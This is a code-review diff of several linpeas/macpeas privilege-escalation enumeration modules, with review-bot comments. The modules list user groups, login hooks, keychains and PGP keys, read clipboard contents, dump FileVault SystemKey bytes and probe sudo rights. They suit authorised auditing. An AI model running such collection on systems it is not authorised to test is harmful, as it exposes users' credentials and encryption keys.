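Review bot: the guard reads `$FAST` and `$SUPERFAST`, but `# Global Variables:` lists only `$IAMROOT, $PASSTRY, $TIMEOUT`; add them so the builder sees the real dependencies. `$POSSIBE_SU_BRUTE` is misspelled consistently (header and both uses) and would read better as `POSSIBLE_SU_BRUTE`. `SHELLUSERS=$(cat /etc/passwd 2>/dev/null | grep -i "sh$" | cut -d ":" -f 1)` can drop the `cat`: `grep -i "sh$" /etc/passwd 2>/dev/null | cut -d ":" -f 1`.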

View File

@ -0,0 +1,20 @@
# Title: Users Information - MacOS my user hooks
# ID: UG_Macos_my_user_hooks
# Author: Carlos Polop
# Last Update: 22-08-2023
# Description: Get current user Login and Logout hooks
# License: GNU GPL
# Version: 1.0
# Functions Used: print_2title
# Global Variables: $HOME, $MACPEAS
# Initial Functions:
# Generated Global Variables:
# Fat linpeas: 0
# Small linpeas: 0
if [ "$MACPEAS" ];then
print_2title "Current user Login and Logout hooks"
defaults read $HOME/Library/Preferences/com.apple.loginwindow.plist 2>/dev/null | grep -e "Hook"
echo ""
fi
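Review bot: `defaults read $HOME/Library/Preferences/com.apple.loginwindow.plist` leaves `$HOME` unquoted, so a home path containing spaces splits into several arguments and `defaults` reads the wrong domain; quote it as `"$HOME/Library/Preferences/com.apple.loginwindow.plist"`, matching the quoted form used in the all-users hooks module.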

View File

@ -0,0 +1,19 @@
# Title: Users Information - My User
# ID: UG_My_user
# Author: Carlos Polop
# Last Update: 22-08-2023
# Description: My User
# License: GNU GPL
# Version: 1.0
# Functions Used: print_2title, print_info
# Global Variables: $groupsB, $groupsVB, $idB, $knw_grps , $knw_usrs, $nosh_usrs,$sh_usrs, $USER
# Initial Functions:
# Generated Global Variables:
# Fat linpeas: 0
# Small linpeas: 1
print_2title "My user"
print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#users"
(id || (whoami && groups)) 2>/dev/null | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" | sed -${E} "s,$idB,${SED_RED},g"
echo ""
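Review bot: the `# Global Variables:` line has irregular separators (`$knw_grps , $knw_usrs, $nosh_usrs,$sh_usrs`); if the builder splits this list on `, `, the stray space and the missing one produce malformed names, so normalise it to `$groupsB, $groupsVB, $idB, $knw_grps, $knw_usrs, $nosh_usrs, $sh_usrs, $USER`.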

View File

@ -0,0 +1,25 @@
# Title: Users Information - MacOS user hooks
# ID: UG_Macos_user_hooks
# Author: Carlos Polop
# Last Update: 22-08-2023
# Description: Enumerate all users login and logout hooks
# License: GNU GPL
# Version: 1.0
# Functions Used: print_2title
# Global Variables: $MACPEAS
# Initial Functions:
# Generated Global Variables: $user_home
# Fat linpeas: 0
# Small linpeas: 0
if [ "$MACPEAS" ];then
print_2title "All Login and Logout hooks"
for user_home in /Users/*/ /private/var/root/; do
if [ -f "${user_home}Library/Preferences/com.apple.loginwindow.plist" ]; then
echo "User: $(basename "$user_home")" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g"
defaults read "${user_home}Library/Preferences/com.apple.loginwindow.plist" 2>/dev/null | grep -e "Hook" | sed -${E} "s,.*,${SED_RED_YELLOW},g"
fi
done
echo ""
fi
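Review bot: the `-f` test on `${user_home}Library/Preferences/com.apple.loginwindow.plist` is false both when the plist is absent and when the directory is not searchable, as `/private/var/root/` is for non-root runs, so other users' hooks are skipped silently; checking the directory first with `[ -x "${user_home}Library/Preferences" ]` and printing a not-readable line when that fails lets the reader tell "no hooks" from "could not check".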

View File

@ -0,0 +1,29 @@
# Title: Users Information - MacOS Keychains
# ID: UG_Macos_keychains
# Author: Carlos Polop
# Last Update: 22-08-2023
# Description: Get macOS keychains information
# License: GNU GPL
# Version: 1.0
# Functions Used: print_2title, print_info
# Global Variables: $MACPEAS
# Initial Functions:
# Generated Global Variables: $user_home
# Fat linpeas: 0
# Small linpeas: 0
if [ "$MACPEAS" ];then
print_2title "Keychains"
print_info "https://book.hacktricks.wiki/en/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-sensitive-locations.html#chainbreaker"
echo "System Keychains:" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g"
security list-keychains 2>/dev/null | sed -${E} "s,.*,${SED_RED},g"
echo -e "\nUser Keychains:" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g"
for user_home in /Users/*/; do
if [ -d "${user_home}Library/Keychains" ]; then
echo "- User: $(basename "$user_home")" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g"
ls -la "${user_home}Library/Keychains/" 2>/dev/null | sed -${E} "s,.*,${SED_RED},g"
fi
done
echo ""
fi
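Review bot: `security list-keychains` without `-d` prints the current user's keychain search list (normally login.keychain-db plus System.keychain), so labelling it "System Keychains:" is misleading; use `security list-keychains -d system` for the system domain and `-d user` for the current user's. `echo -e "\nUser Keychains:"` is not portable: under macOS `/bin/sh` it prints a literal `-e`, so prefer `printf "\nUser Keychains:\n"`; the same applies to the other `echo -e` lines in this change.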

View File

@ -0,0 +1,28 @@
# Title: Users Information - MacOS SystemKey
# ID: UG_Macos_systemkey
# Author: Carlos Polop
# Last Update: 22-08-2023
# Description: Get macOS SystemKey information (used for FileVault encryption)
# License: GNU GPL
# Version: 1.0
# Functions Used: print_2title
# Global Variables: $MACPEAS
# Initial Functions:
# Generated Global Variables:
# Fat linpeas: 0
# Small linpeas: 0
if [ "$MACPEAS" ];then
print_2title "SystemKey"
echo "The SystemKey is used by FileVault to encrypt/decrypt the volume. If you can read it, you might be able to decrypt the disk."
echo -e "\nSystemKey file permissions:" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g"
ls -l /var/db/SystemKey 2>/dev/null | sed -${E} "s,.*,${SED_RED_YELLOW},g"
if [ -r "/var/db/SystemKey" ]; then
echo -e "\nWARNING: You can read /var/db/SystemKey!" | sed -${E} "s,.*,${SED_RED},g"
echo "SystemKey content (first 24 bytes after header):" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g"
hexdump -s 8 -n 24 -e '1/1 "%.2x"' /var/db/SystemKey | sed -${E} "s,.*,${SED_RED_YELLOW},g"
fi
echo ""
fi
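Review bot: the hexdump line emits 24 bytes of key material with no trailing newline, so whatever prints next is glued onto the hex string; `hexdump -s 8 -n 24 -e '24/1 "%.2x" "\n"' /var/db/SystemKey` terminates the line. More importantly, writing FileVault key bytes into a report that is routinely saved or pasted elsewhere is a handling risk; stating that the file is readable (at most with a hash of the bytes) is enough to flag the misconfiguration. `echo -e` on the two header lines prints a literal `-e` under macOS `/bin/sh`; use `printf`.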

View File

@ -0,0 +1,49 @@
# Title: Users Information - PGP keys
# ID: UG_Pgp_keys
# Author: Carlos Polop
# Last Update: 22-08-2023
# Description: Check for PGP keys and related files that might contain sensitive information
# License: GNU GPL
# Version: 1.0
# Functions Used: echo_not_found, print_2title, print_info
# Global Variables: $HOME
# Initial Functions:
# Generated Global Variables: $pgp_file
# Fat linpeas: 0
# Small linpeas: 1
print_2title "PGP Keys and Related Files"
print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#pgp-keys"
# Check for GPG
echo "GPG:" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g"
if command -v gpg >/dev/null 2>&1; then
echo "GPG is installed, listing keys:"
gpg --list-keys 2>/dev/null | sed -${E} "s,.*,${SED_RED},g"
# Check for private keys
gpg --list-secret-keys 2>/dev/null | sed -${E} "s,.*,${SED_RED_YELLOW},g"
else
echo_not_found "gpg"
fi
# Check for NetPGP
echo -e "\nNetPGP:" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g"
if command -v netpgpkeys >/dev/null 2>&1; then
echo "NetPGP is installed" | sed -${E} "s,.*,${SED_RED_YELLOW},g"
netpgpkeys --list-keys 2>/dev/null | sed -${E} "s,.*,${SED_RED},g"
else
echo_not_found "netpgpkeys"
fi
# Check for common PGP files
echo -e "\nPGP Related Files:" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g"
for pgp_file in "$HOME/.gnupg" "$HOME/.pgp" "$HOME/.openpgp" "$HOME/.ssh/gpg-agent.conf" "$HOME/.config/gpg"; do
if [ -e "$pgp_file" ]; then
echo "Found: $pgp_file"
if [ -d "$pgp_file" ]; then
ls -la "$pgp_file" 2>/dev/null
fi
fi
done
echo ""
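Review bot: `"$HOME/.ssh/gpg-agent.conf"` in the file list looks like a typo; gpg-agent.conf lives in `$HOME/.gnupg/`, which the first entry already covers, so this path never matches. `gpg --list-keys` and `gpg --list-secret-keys` may start a gpg-agent or prompt on a TTY when no keyring exists; `gpg --batch --no-tty --list-keys 2>/dev/null` keeps the enumeration non-interactive. `echo -e` on the two header lines prints a literal `-e` under macOS `/bin/sh`; use `printf`.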

View File

@ -0,0 +1,53 @@
# Title: Users Information - Clipboard and highlighted text
# ID: UG_Clipboard_highlighted_text
# Author: Carlos Polop
# Last Update: 22-08-2023
# Description: Check clipboard and highlighted text for sensitive information
# License: GNU GPL
# Version: 1.0
# Functions Used: echo_not_found, print_2title, print_info
# Global Variables: $DEBUG, $pwd_inside_history
# Initial Functions:
# Generated Global Variables: $content
# Fat linpeas: 0
# Small linpeas: 1
if [ "$(command -v xclip 2>/dev/null || echo -n '')" ] || [ "$(command -v xsel 2>/dev/null || echo -n '')" ] || [ "$(command -v pbpaste 2>/dev/null || echo -n '')" ] || [ "$(command -v wl-paste 2>/dev/null || echo -n '')" ] || [ "$DEBUG" ]; then
print_2title "Clipboard and Highlighted Text"
print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#clipboard"
# Function to check clipboard content
check_clipboard() {
local content="$1"
if [ -n "$content" ]; then
echo "$content" | sed -${E} "s,$pwd_inside_history,${SED_RED},g" | sed -${E} "s,(password|passwd|pwd).*=.*,${SED_RED},g" | sed -${E} "s,(token|key|secret).*=.*,${SED_RED},g"
fi
}
# Check different clipboard tools
if [ "$(command -v xclip 2>/dev/null || echo -n '')" ]; then
echo "Using xclip:" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g"
echo "Clipboard:" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g"
check_clipboard "$(xclip -o -selection clipboard 2>/dev/null)"
echo "Highlighted text:" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g"
check_clipboard "$(xclip -o 2>/dev/null)"
elif [ "$(command -v xsel 2>/dev/null || echo -n '')" ]; then
echo "Using xsel:" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g"
echo "Clipboard:" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g"
check_clipboard "$(xsel -ob 2>/dev/null)"
echo "Highlighted text:" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g"
check_clipboard "$(xsel -o 2>/dev/null)"
elif [ "$(command -v pbpaste 2>/dev/null || echo -n '')" ]; then
echo "Using pbpaste:" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g"
echo "Clipboard:" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g"
check_clipboard "$(pbpaste 2>/dev/null)"
elif [ "$(command -v wl-paste 2>/dev/null || echo -n '')" ]; then
echo "Using wl-paste:" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g"
echo "Clipboard:" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g"
check_clipboard "$(wl-paste 2>/dev/null)"
else
echo_not_found "clipboard tools (xclip, xsel, pbpaste, wl-paste)"
fi
echo ""
fi
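Review bot: `check_clipboard` is a function defined inside the module with `local content`, yet the header declares `# Generated Global Variables: $content` and leaves `# Initial Functions:` empty; either list the function where the builder expects it or inline the pipeline, and note that `local` is not POSIX sh (dash and bash accept it, but the module should follow the dialect the rest of linpeas targets). The clipboard is also echoed verbatim, so a large or binary selection floods the report; capping it with `head -c 2000` before the sed highlighting keeps the output readable.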

View File

@ -0,0 +1,32 @@
# Title: Users Information - Sudo -l
# ID: UG_Sudo_l
# Author: Carlos Polop
# Last Update: 22-08-2023
# Description: Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d
# License: GNU GPL
# Version: 1.0
# Functions Used: echo_not_found, print_2title, print_info
# Global Variables:$IAMROOT, $PASSWORD, $sudoB, $sudoG, $sudoVB1, $sudoVB2
# Initial Functions:
# Generated Global Variables:
# Fat linpeas: 0
# Small linpeas: 1
print_2title "Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d"
print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sudo-and-suid"
(echo '' | timeout 1 sudo -S -l | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW}," | sed -${E} "s,$sudoB,${SED_RED},g" | sed "s,\!root,${SED_RED},") 2>/dev/null || echo_not_found "sudo"
if [ "$PASSWORD" ]; then
(echo "$PASSWORD" | timeout 1 sudo -S -l | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW}," | sed -${E} "s,$sudoB,${SED_RED},g") 2>/dev/null || echo_not_found "sudo"
fi
( grep -Iv "^$" cat /etc/sudoers | grep -v "#" | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW}," | sed -${E} "s,$sudoB,${SED_RED},g" | sed "s,pwfeedback,${SED_RED},g" ) 2>/dev/null || echo_not_found "/etc/sudoers"
if ! [ "$IAMROOT" ] && [ -w '/etc/sudoers.d/' ]; then
echo "You can create a file in /etc/sudoers.d/ and escalate privileges" | sed -${E} "s,.*,${SED_RED_YELLOW},"
fi
for f in /etc/sudoers.d/*; do
if [ -r "$f" ]; then
echo "Sudoers file: $f is readable" | sed -${E} "s,.*,${SED_RED},g"
grep -Iv "^$" "$f" | grep -v "#" | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW}," | sed -${E} "s,$sudoB,${SED_RED},g" | sed "s,pwfeedback,${SED_RED},g"
fi
done
echo ""
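Review bot: `grep -Iv "^$" cat /etc/sudoers` passes the word `cat` to grep as a file name, so grep reports a missing file (hidden by `2>/dev/null`) and, now having two file arguments, prefixes every sudoers line with `/etc/sudoers:`; the intended command is `grep -Iv "^$" /etc/sudoers | grep -v "#" | ...`. Two header nits: `# Global Variables:$IAMROOT` lacks the space after the colon, and `$f` from the `for f in /etc/sudoers.d/*` loop is not listed under `# Generated Global Variables:`.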

Some files were not shown because too many files have changed in this diff.